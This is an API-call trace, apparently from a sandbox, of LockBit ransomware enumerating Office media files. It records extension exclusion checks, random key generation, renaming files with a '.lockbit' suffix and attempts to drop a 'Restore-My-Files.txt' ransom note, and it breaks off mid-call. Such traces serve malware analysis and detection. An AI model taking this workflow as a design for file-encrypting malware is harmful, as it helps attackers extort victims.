[0205.991] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.991] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.991] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0205.991] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14769_.GIF.lockbit") returned 76 [0205.991] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14769_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14769_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0205.992] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0205.992] malloc (_Size=0x40068) returned 0x3d70450 [0205.993] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=362) returned 1 [0205.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.993] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.993] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0205.993] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.994] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.994] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0205.994] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0205.995] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14769_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14769_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0205.995] malloc (_Size=0xae) returned 0x1fa2ed8 [0205.995] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0205.996] free (_Block=0x1fa2ed8) [0205.996] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14769_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0205.996] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0205.996] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0205.996] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa0af000, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbc9c4720, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaa0af000, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x1f3, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14800_.GIF", cAlternateFileName="")) returned 1 [0205.996] lstrcmpiW (lpString1=".", lpString2="BD14800_.GIF") returned -1 [0205.996] lstrcmpiW (lpString1="..", lpString2="BD14800_.GIF") returned -1 [0205.996] PathFindExtensionW (pszPath="BD14800_.GIF") returned=".GIF" [0205.996] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0205.996] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0205.996] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0205.996] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0205.996] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0205.996] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0205.996] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0205.996] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0205.997] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0205.997] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0205.997] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0205.997] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0205.997] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0205.997] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0205.997] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0205.997] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0205.997] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0205.998] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14800_.GIF") returned 1 [0205.998] lstrcmpiW (lpString1="ntldr", lpString2="BD14800_.GIF") returned 1 [0205.998] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14800_.GIF") returned 1 [0205.998] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14800_.GIF") returned 1 [0205.998] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14800_.GIF") returned -1 [0205.998] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14800_.GIF") returned 1 [0205.998] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14800_.GIF") returned 1 [0205.998] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0205.998] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14800_.GIF") returned=".GIF" [0205.998] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0205.998] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0205.999] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0205.999] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0206.000] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14800_.GIF.lockbit") returned 76 [0206.000] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14800_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14800_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0206.000] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0206.000] malloc (_Size=0x40068) returned 0x3f70048 [0206.000] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x3f70060 | out: lpFileSize=0x3f70060*=499) returned 1 [0206.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb007c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb007c) returned 0x0 [0206.001] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.002] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.002] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3fb008c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3fb008c) returned 0x0 [0206.002] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0206.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14800_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14800_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.003] malloc (_Size=0xae) returned 0x1fa2ed8 [0206.003] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0206.004] free (_Block=0x1fa2ed8) [0206.004] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14800_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0206.004] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0206.004] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0206.004] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaa0af000, ftCreationTime.dwHighDateTime=0x1bd9367, ftLastAccessTime.dwLowDateTime=0xbc9ea880, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xaa0af000, ftLastWriteTime.dwHighDateTime=0x1bd9367, nFileSizeHigh=0x0, nFileSizeLow=0x384, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14801_.GIF", cAlternateFileName="")) returned 1 [0206.004] lstrcmpiW (lpString1=".", lpString2="BD14801_.GIF") returned -1 [0206.004] lstrcmpiW (lpString1="..", lpString2="BD14801_.GIF") returned -1 [0206.004] PathFindExtensionW (pszPath="BD14801_.GIF") returned=".GIF" [0206.004] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0206.004] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0206.004] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0206.004] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0206.004] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0206.004] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0206.005] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0206.005] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0206.005] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0206.005] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0206.005] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0206.005] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0206.005] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0206.005] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0206.005] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0206.006] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0206.006] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD14801_.GIF") returned 1 [0206.006] lstrcmpiW (lpString1="ntldr", lpString2="BD14801_.GIF") returned 1 [0206.006] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD14801_.GIF") returned 1 [0206.006] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD14801_.GIF") returned 1 [0206.006] lstrcmpiW (lpString1="autorun.inf", lpString2="BD14801_.GIF") returned -1 [0206.006] lstrcmpiW (lpString1="thumbs.db", lpString2="BD14801_.GIF") returned 1 [0206.006] lstrcmpiW (lpString1="iconcache.db", lpString2="BD14801_.GIF") returned 1 [0206.007] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\") returned="" [0206.007] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14801_.GIF") returned=".GIF" [0206.007] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0206.007] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0206.007] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0206.007] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0206.007] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0206.007] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0206.007] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0206.007] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0206.007] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0206.007] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0206.008] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0206.008] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0206.008] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0206.008] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0206.008] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0206.008] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0206.008] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14801_.GIF.lockbit") returned 76 [0206.008] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14801_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd14801_.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0206.009] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0206.009] malloc (_Size=0x40068) returned 0x3e70008 [0206.009] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=900) returned 1 [0206.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.009] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.009] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0206.009] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.010] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.010] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0206.010] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0206.022] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14801_.GIF.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14801_.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0206.022] malloc (_Size=0xae) returned 0x1fa2ed8 [0206.022] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6aa8c, FileInformation=0x1fa2ed8, Length=0xae, FileInformationClass=0xa) returned 0x0 [0206.024] free (_Block=0x1fa2ed8) [0206.024] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD14801_.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES") returned 1 [0206.024] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt") returned 76 [0206.024] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0206.024] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3e9a00, ftCreationTime.dwHighDateTime=0x1bd8f92, ftLastAccessTime.dwLowDateTime=0xbca109e0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xf3e9a00, ftLastWriteTime.dwHighDateTime=0x1bd8f92, nFileSizeHigh=0x0, nFileSizeLow=0x13c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD14844_.GIF", cAlternateFileName="")) returned 1 [0206.024] lstrcmpiW (lpString1=".", lpString2="BD14844_.GIF") returned -1 [0206.024] lstrcmpiW (lpString1="..", lpString2="BD14844_.GIF") returned -1 [0206.024] PathFindExtensionW (pszPath="BD14844_.GIF") returned=".GIF" [0206.024] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0206.024] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0206.024] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0206.024] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0206.024] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0206.024] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0206.024] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0206.024] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0206.025] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0206.025] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0206.025] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0206.025] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0206.025] 